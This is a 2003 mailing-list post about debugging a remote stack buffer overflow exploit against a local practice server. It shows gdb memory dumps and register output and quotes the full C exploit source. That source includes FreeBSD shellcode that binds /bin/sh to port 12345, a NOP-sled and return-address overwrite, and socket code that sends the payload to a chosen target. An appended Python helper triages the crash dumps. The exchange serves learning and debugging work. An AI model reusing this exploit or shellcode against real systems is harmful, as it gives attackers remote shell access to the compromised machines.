Re: sample buffer overflow exploit problem
From: Ganbold (ganbold@micom.mng.net)
Date: Tue Sep 30 2003 - 20:06:52 CDT
Hi Orlando,
I tested your modified exploit.
When I run the exploit with offset 320:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 320
scsize: 131
ret: 0xbfbffa40
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
-----------------------------------------------------------------------------------------------------------------------------
It binds a shell to port 12345. When I make a connection to it, in gdb I see the following:
-----------------------------------------------------------------------------------------------------------------------------
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0xbfbffa8f in ?? ()
(gdb) x/200bx $esp-200
0xbfbff9c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbff9f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa10: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa18: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa20: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa28: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa30: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa38: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa40: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83
^^^^^^ shellcode begins
0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50
0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66
0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a
0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80
0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0
0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50
0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57
0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31
-----------------------------------------------------------------------------------------------------------------------------
As you see, the shellcode is not complete; I see only half of my shellcode.
So when the exploit runs, the server doesn't crash and binds the shell port. But when I
make a connection to port 12345, the server crashes and the x/200bx $esp-200 command shows
the above half of my shellcode.
Following is the register information after the crash:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax 0x9 9
ecx 0xbfbffaec -1077937428
edx 0xbfbffacc -1077937460
ebx 0x9 9
esp 0xbfbffa90 0xbfbffa90
ebp 0xbfbffa40 0xbfbffa40
esi 0xbfbffb80 -1077937280
edi 0x8 8
eip 0xbfbffa8f 0xbfbffa8f
eflags 0x10206 66054
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000)
st1 -nan(0x000002000) (raw 0xffff0000000000002000)
st2 0 (raw 0x00000000000000000000)
st3 0 (raw 0x00000000000000000000)
st4 0 (raw 0x00000000000000000000)
st5 3.6715164242195896804332733154296875e-10 (raw 0x3fdfc9d8000000000000)
st6 24 (raw 0x4003c000000000000000)
st7 60 (raw 0x4004f000000000000000)
fctrl 0x127f 4735
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
-----------------------------------------------------------------------------------------------------------------------------
But when I run the exploit with offset 0 I see a different situation:
-----------------------------------------------------------------------------------------------------------------------------
bash-2.05b$ ./expl_or 127.0.0.1 30460 0
scsize: 131
ret: 0xbfbffb80
bash-2.05b$
-----------------------------------------------------------------------------------------------------------------------------
In gdb on server I see:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) run 30460
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/tsgan/bof_files/vulnerable 30460
client from 127.0.0.1
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGILL, Illegal instruction.
0xbfbffb8c in ?? ()
(gdb) x/300bx $esp-300
0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83
^^^^^^ shellcode begins
0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50
0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66
0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a
0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80
0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0
0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50
0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57
0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31
0xbfbffa90: 0xc0 0x50 0x53 0x50 0xb0 0x5a 0xcd 0x80
0xbfbffa98: 0xb0 0x01 0x50 0x53 0x50 0x83 0xc0 0x59
0xbfbffaa0: 0xcd 0x80 0xb0 0x02 0x50 0x53 0x50 0x83
0xbfbffaa8: 0xc0 0x58 0xcd 0x80 0x31 0xc0 0x50 0x68
0xbfbffab0: 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69
0xbfbffab8: 0x6e 0x89 0xe3 0x50 0x53 0x89 0xe2 0x50
0xbfbffac0: 0x52 0x53 0x50 0xb0 0x3b 0xcd 0x80 0x31
0xbfbffac8: 0xc0 0x40 0x50 0x50 0xcd 0x80 0x90 0x90
^^^^^^ shellcode ends
0xbfbffad0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffad8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffae0: 0x90 0x90 0x90 0x90 0x80 0xfb 0xbf 0xbf
^^^^^^ return address
0xbfbffae8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffaf0: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffaf8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb00: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb08: 0x80 0xfb 0xbf 0x2c 0x20 0x6e 0x69 0x63
^^^^^^ ends here
0xbfbffb10: 0x65 0x20 0x74 0x6f 0x20 0x6d 0x65 0x65
0xbfbffb18: 0x74 0x20 0x79 0x6f 0x75 0x21 0x0d 0x0a
0xbfbffb20: 0x00 0x00 0x00 0x00 0x74 0x02 0x76 0xfc
0xbfbffb28: 0x00 0x00 0x00 0x00 0x41 0xc6 0x04 0x28
0xbfbffb30: 0x7e 0xf7 0x0f 0x28 0x60 0x00 0x00 0x00
0xbfbffb38: 0x10 0x00 0x00 0x00 0x07 0x00 0x00 0x00
0xbfbffb40: 0x06 0x00 0x00 0x00 0x02 0x00 0x00 0x00
0xbfbffb48: 0x6c 0xfb 0xbf 0xbf 0x6c 0xfb 0xbf 0xbf
0xbfbffb50: 0x15 0x87 0x04 0x08 0x02 0x00 0x00 0x00
0xbfbffb58: 0x74 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
0xbfbffb60: 0x68 0xfb 0xbf 0xbf 0x00 0x00 0x00 0x00
0xbfbffb68: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
0xbfbffb70: 0x02 0x00 0x00 0x00
-----------------------------------------------------------------------------------------------------------------------------
As you see, I see all my shellcode and the return address fully.
Following is the register info:
-----------------------------------------------------------------------------------------------------------------------------
(gdb) info all-registers
eax 0xffffffff -1
ecx 0x9 9
edx 0xffffffff -1
ebx 0x2 2
esp 0xbfbffb74 0xbfbffb74
ebp 0xbfbffb80 0xbfbffb80
esi 0xbfbffb80 -1077937280
edi 0xbfbffcb2 -1077936974
eip 0xbfbffb8c 0xbfbffb8c
eflags 0x10246 66118
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000)
st1 -nan(0x000002000) (raw 0xffff0000000000002000)
st2 0 (raw 0x00000000000000000000)
st3 0 (raw 0x00000000000000000000)
st4 0 (raw 0x00000000000000000000)
st5 0 (raw 0x00000000000000000000)
st6 0 (raw 0x00000000000000000000)
st7 10 (raw 0x4002a000000000000000)
fctrl 0x127f 4735
fstat 0x0 0
ftag 0x0 0
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
-----------------------------------------------------------------------------------------------------------------------------
I'm very confused and I don't know yet what to do.
Please give me some advice.
thanks in advance,
Ganbold
At 01:45 PM 9/30/2003 -0500, you wrote:
>attachment
>
>#include <stdio.h>
>#include <stdlib.h>      /* atoi, exit */
>#include <string.h>      /* memset, memcpy, strlen */
>#include <netinet/in.h>
>#include <netdb.h>
>#include <sys/socket.h>
>#include <sys/select.h>  /* select, FD_* */
>#include <sys/types.h>
>#include <errno.h>
>#include <unistd.h>
>
>/*
> * FreeBSD shellcode - binds /bin/sh to a port 12345
> *
> * Claes M. Nyberg 20020619
> *
> * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
> */
>char shellcode[] =
>/* port _______*/
>"\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39"
>"\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd"
>"\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83"
>"\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53"
>"\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50"
>"\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
>"\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0"
>"\x40\x50\x50\xcd\x80";
>#define RET 0xbfbffb80 //0xbfbffa48
>
>int exec_sh(int sockfd)
>{
> char snd[4096],rcv[4096];
> fd_set rset;
> while(1)
> {
> FD_ZERO(&rset);
> FD_SET(fileno(stdin),&rset);
> FD_SET(sockfd,&rset);
> select(255,&rset,NULL,NULL,NULL);
> if(FD_ISSET(fileno(stdin),&rset))
> {
> memset(snd,0,sizeof(snd));
> fgets(snd,sizeof(snd),stdin);
> write(sockfd,snd,strlen(snd));
> }
> if(FD_ISSET(sockfd,&rset))
> {
> memset(rcv,0,sizeof(rcv));
> if(read(sockfd,rcv,sizeof(rcv))<=0)
> exit(0);
> fputs(rcv,stdout);
> }
> }
>}
>
>int main(int argc, char *argv[]) {
>
> char buffer[1064];
> int s,t, i, size,offset;
> struct sockaddr_in remote;
> struct hostent *host;
>
> if(argc != 4) {
> printf("Usage: %s target-ip port offset\n", argv[0]);
> return -1;
> }
> offset = RET - atoi(argv[3]);
> // filling buffer with NOPs
> memset(buffer, 0x90, 1064);
>
> printf("scsize: %d\nret: 0x%x\n",sizeof(shellcode)-1,offset);
> //copying shellcode into buffer
> memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
>
> // Copying the return address multiple times at the end of the buffer...
> for(i=1022; i < 1060; i+=4) {
> * ((int *) &buffer[i]) = offset;
> }
>
> buffer[1061] = 0x0;
>
> //getting hostname
>
> host=gethostbyname(argv[1]);
> if (host==NULL)
> {
> fprintf(stderr, "Unknown Host %s\n",argv[1]);
> return -1;
> }
>
> // creating socket...
> s = socket(AF_INET, SOCK_STREAM, 0);
> if (s < 0)
> {
> fprintf(stderr, "Error: Socket\n");
> return -1;
> }
> remote.sin_family = AF_INET;
> remote.sin_addr = *((struct in_addr *)host->h_addr);
> remote.sin_port = htons(atoi(argv[2]));
> // connecting with destination host
> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> {
> close(s);
> fprintf(stderr, "Error: connect\n");
> return -1;
> }
> //sending exploit string
> size = send(s, buffer, sizeof(buffer), 0);
> if (size==-1)
> {
> close(s);
> fprintf(stderr, "sending data failed\n");
> return -1;
> }
>/*
> printf("[-] Connecting to bindshell...\n");
> remote.sin_family = AF_INET;
> remote.sin_addr = *((struct in_addr *)host->h_addr);
> remote.sin_port = htons(12345);
> if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
> {
> close(s);
> fprintf(stderr, "Error: connect\n");
> return -1;
> }
> exec_sh(s);
>*/
> // closing socket
> close(s);
>}
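Added example, not part of the post or of the quoted exploit: a small Python crash-triage helper that parses the gdb x/Nbx dumps quoted above and reports which part of the injected buffer EIP, ESP and the chosen return address land in. It assumes the shellcode prefix and its length (scsize: 131) from the post; the sample dump lines are copied from the two dumps above.

```python
import re

# Constructed sample: memory lines copied from the two gdb dumps in the post.
DUMP = """\
0xbfbffa40: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83
0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50
0xbfbffae0: 0x90 0x90 0x90 0x90 0x80 0xfb 0xbf 0xbf
0xbfbffae8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf
"""
SC_PREFIX = bytes.fromhex("6a1089e183ec1089e3")  # first bytes of the quoted shellcode
SC_LEN = 131                                     # "scsize: 131" printed by the exploit
LINE_RE = re.compile(r"^(0x[0-9a-f]+):((?:\s+0x[0-9a-f]{2})+)\s*$", re.I)

def parse_gdb_dump(text):
    """Turn gdb 'x/Nbx' output into {address: byte}; annotation lines are skipped."""
    mem = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            base = int(m.group(1), 16)
            for i, tok in enumerate(m.group(2).split()):
                mem[base + i] = int(tok, 16)
    return mem

def find_bytes(mem, pattern):
    """Lowest address at which `pattern` occurs contiguously, else None."""
    for addr in sorted(mem):
        if all(mem.get(addr + i) == b for i, b in enumerate(pattern)):
            return addr
    return None

def triage(dump_text, eip, esp, ret_word):
    """Map EIP, ESP and the injected return address to the region each falls in."""
    mem, regions = parse_gdb_dump(dump_text), {}
    sc = find_bytes(mem, SC_PREFIX)
    if sc is not None:
        lo = sc
        while mem.get(lo - 1) == 0x90:            # walk back over the NOP sled
            lo -= 1
        regions["nop sled"], regions["shellcode"] = (lo, sc), (sc, sc + SC_LEN)
    word = ret_word.to_bytes(4, "little")
    sled = find_bytes(mem, word * 3)              # 3+ consecutive copies of the address
    if sled is not None:
        hi = sled
        while all(mem.get(hi + i) == b for i, b in enumerate(word)):
            hi += 4
        regions["return-address sled"] = (sled, hi)
    where = lambda x: next((n for n, r in regions.items() if r[0] <= x < r[1]), "outside dump")
    return {"eip": where(eip), "esp": where(esp), "ret": where(ret_word), "regions": regions}
```

For the offset-320 crash it reports EIP and ESP both inside the shellcode; for offset 0 the return address, EIP and ESP all fall outside the dumped range, which matches the SIGILL at 0xbfbffb8c.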